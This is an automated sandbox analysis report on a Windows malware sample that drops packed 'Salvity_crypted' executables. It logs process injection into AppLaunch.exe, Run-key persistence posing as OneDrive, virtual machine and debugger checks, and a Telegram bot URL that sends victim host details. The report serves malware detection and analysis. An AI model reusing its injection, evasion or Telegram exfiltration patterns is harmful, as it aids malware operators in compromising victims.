Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FA743 push ecx; ret 21_2_009FA756
PE file contains sections with non-standard names
Source: [New]1.exe.0.dr Static PE information: section name: crL2t
Source: [New]1.exe.0.dr Static PE information: section name: 0wrVPjE
Source: [New]1.exe.0.dr Static PE information: section name: YW7wta
Source: [New]1.exe.0.dr Static PE information: section name: obFJa
Source: [New]1.exe.0.dr Static PE information: section name: e5WJl%
Source: [New]1.exe.0.dr Static PE information: section name: 9RdLoc
Source: [New]1.exe.0.dr Static PE information: section name: Lnxjc
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: CwRJt
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: V1Huayq
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: 3gNuta
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: qi7ga
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: p4YOu8
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: jnlhoc
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: tM59c
Source: OneDrive.exe.11.dr Static PE information: section name: _RDATA
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: crL2t
Source: initial sample Static PE information: section name: e5WJl% entropy: 6.83077583857
Source: initial sample Static PE information: section name: p4YOu8 entropy: 6.82903967551

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: reg.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe Jump to dropped file
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Roaming\[New]1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneDrive Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneDrive Jump to behavior
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406F00 FindFirstFileA, 11_2_00406F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004364E3 FindFirstFileExW, 11_2_004364E3
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe API call chain: ExitProcess graph end node
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USne
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMV
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMVrInte
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00429143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00429143
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00437E10 GetProcessHeap, 11_2_00437E10
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00429634 mov eax, dword ptr fs:[00000030h] 11_2_00429634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004326E4 mov eax, dword ptr fs:[00000030h] 11_2_004326E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004326A0 mov eax, dword ptr fs:[00000030h] 11_2_004326A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00432715 mov eax, dword ptr fs:[00000030h] 11_2_00432715
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00421C60 mov eax, dword ptr fs:[00000030h] 11_2_00421C60
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A03A35 mov eax, dword ptr fs:[00000030h] 21_2_00A03A35
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A0EC04 mov eax, dword ptr fs:[00000030h] 21_2_00A0EC04
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009F27C0 mov eax, dword ptr fs:[00000030h] 21_2_009F27C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00425476 SetUnhandledExceptionFilter, 11_2_00425476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00429143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00429143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004252E3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004252E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00424E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00424E5C
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FA8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_009FA8E8
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A00430 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_00A00430
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FAC0D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_009FAC0D

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9C7008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9B4008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Roaming\[New]1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A108E9
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A109CF
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A10934
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A06276
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 21_2_00A10DD3
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 21_2_00A10647
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 21_2_00A10FA8
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetLocaleInfoW, 21_2_00A06798
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00402440 cpuid 11_2_00402440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004251D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_004251D0
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 620098 Sample: 68e7a0fa9f7dbbb34bc4bad9769... Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 50 Antivirus detection for dropped file 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Multi AV Scanner detection for dropped file 2->54 56 4 other signatures 2->56 9 68e7a0fa9f7dbbb34bc4bad97690ea72.exe 9 2->9         started        process3 file4 40 C:\Users\user\...\[New]Salvity_crypted(2).exe, PE32 9->40 dropped 42 C:\Users\user\AppData\Roaming\[New]1.exe, PE32 9->42 dropped 12 [New]1.exe 1 9->12         started        15 [New]Salvity_crypted(2).exe 1 9->15         started        process5 signatures6 64 Writes to foreign memory regions 12->64 66 Allocates memory in foreign processes 12->66 68 Injects a PE file into a foreign processes 12->68 17 AppLaunch.exe 19 12->17         started        22 conhost.exe 12->22         started        24 AppLaunch.exe 15 3 15->24         started        26 conhost.exe 15->26         started        process7 dnsIp8 44 api.telegram.org 149.154.167.220, 443, 49752, 49753 TELEGRAMRU United Kingdom 17->44 46 ipinfo.io 34.117.59.81, 49751, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 17->46 36 C:\Users\user\AppData\Local\...\OneDrive.exe, PE32+ 17->36 dropped 38 C:\Users\user\AppData\Local\...\Secur32.dll, PE32+ 17->38 dropped 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->58 60 May check the online IP address of the machine 17->60 62 Uses cmd line tools excessively to alter registry or file data 17->62 28 reg.exe 1 1 17->28         started        30 reg.exe 1 1 17->30         started        48 ip-api.com 208.95.112.1, 49758, 80 TUT-ASUS United States 24->48 file9 signatures10 process11 process12 32 conhost.exe 28->32         started        34 conhost.exe 30->34         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false

Contacted Domains

Name IP Active
ipinfo.io 34.117.59.81 true
ip-api.com 208.95.112.1 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A false
    		high
    http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A false
      		high
      http://ipinfo.io/json false
        		high
        http://ip-api.com/line/?fields=hosting false
          		high